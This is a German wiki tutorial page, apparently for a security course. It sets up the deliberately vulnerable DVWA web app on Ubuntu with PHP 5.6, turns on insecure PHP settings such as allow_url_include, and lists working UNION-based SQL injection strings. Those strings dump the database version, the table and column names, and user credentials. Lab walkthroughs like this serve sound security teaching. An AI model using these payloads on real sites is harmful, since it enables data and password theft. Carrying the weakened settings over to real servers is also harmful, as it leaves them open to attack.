Thomas.will: Die Seite wurde neu angelegt: „==Voraussetzungen== Apache, Mysql, installiert apt-get install apache2 mysql-server php < 7.0 muss installiert sein Ubuntu 16.04: sudo add-apt-repository…“

2020-10-07T17:20:41Z

Die Seite wurde neu angelegt: „==Voraussetzungen== *Apache, Mysql, installiert apt-get install apache2 mysql-server *php < 7.0 muss installiert sein Ubuntu 16.04: sudo add-apt-repository…“

Neue Seite

==Voraussetzungen==
*Apache, Mysql, installiert
apt-get install apache2 mysql-server
*php < 7.0 muss installiert sein
Ubuntu 16.04:
sudo add-apt-repository ppa:ondrej/php
apt-get update
apt-get install php5.6 php5.6-mysql php5.6-gd
php -v
==Installation DVWA==
*Nach dem Download Entpacken und Verschieben ins DocumentRoot
unzip DVWA-master.zip
mv DVWA-master /var/www/html/dvwa
*cd /var/www/html/dvwa/
*cp config/config.inc.php.dist config/config.inc.php
*vi config
*Anpassen der Konfiguration dvwa:
vi config/config.inc.php:
$_DVWA[ 'db_password' ] = 'das_vergebene_passwort';

Falls das Insecure Captcha Modul benutzt werden soll:
$_DVWA[ 'recaptcha_public_key = ''
$_DVWA[ 'recaptcha_private_key = ''

Die Werte für die beiden Optionen müssen zuerst generiert werden (ein google Account ist Voraussetzung): https://www.google.com/recaptcha/admin/create
*Anpassen der php Konfiguration:
vi /etc/php/5.6/apache2/php.ini
allow_url_include = on
allow_url_fopen = on
safe_mode = off
magic_quotes_gpc = off (fuer php <= 5.4)

service apache2 restart
*Anpassen der Verzeichnisrechte:
chown www-data hackable/uploads/
chown www-data external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
*Anpassen der .htaccess Datei
vi .htaccess

<IfModule mod_php5.c>
php_flag magic_quotes_gpc Off
#php_flag allow_url_fopen on
#php_flag allow_url_include on
</IfModule>
ersetzen durch:
<IfModule mod_php5.c>
magic_quotes_gpc = Off
allow_url_fopen = On
allow_url_include = On
</IfModule>

*Aufruf von http://127.0.0.1/dvwa/setup.php - Create / Reset Database
*Einloggen mit Default Zugangsdaten
Username: admin
Passwort: password

Direkt nach der Installation ist die Anwendung 'sicher' eingestellt. Das Sicherheitslevel kann unter DVWA Security angepasst werden.

==SQL Injection mit DVWA==
*Sicherheitslevel low
*SQL Injection aufrufen

*Normale Eingabe in Textbox:
1
Ausgabe von ID, Vorname und Nachname

SQL Abfrage auf der Datenbank:
SELECT first_name, last_name FROM users WHERE user_id = '1'

Ziel ist es durch die Benutzereingabe Code einzufügen, der vom Datenbanksystem ausgeführt wird.

===Beispielhafte Eingaben zur Manipulation===

*Ausgabe aller User:
%' or '0'='0
*Ausgabe der Datenbackversion (ganz unten)
%' or 0=0 union select null, version() #
*Ausgabe des Db Benutzers der die Abfragen durchführt
%' or 0=0 union select null, user() #
*Ausgabe der aktuellen Datenbank
%' or 0=0 union select null, database() #
*Ausgabe aller Tabellen die mit user beginnen
%' or 0=0 union select null, table_name from information_schema.tables where table_name like 'user%' #
*Ausgabe aller Felder in der Tabelle users
%' or 0=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
0x0a: Zeilenumbruch
*Ausgabe der Benutzer und Passwoerter
%' or 0=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

SQL Injection - Damn Vulnerable Web App - Versionsgeschichte

Thomas.will: Die Seite wurde neu angelegt: „==Voraussetzungen== *Apache, Mysql, installiert apt-get install apache2 mysql-server *php < 7.0 muss installiert sein Ubuntu 16.04: sudo add-apt-repository…“

Thomas.will: Die Seite wurde neu angelegt: „==Voraussetzungen== Apache, Mysql, installiert apt-get install apache2 mysql-server php < 7.0 muss installiert sein Ubuntu 16.04: sudo add-apt-repository…“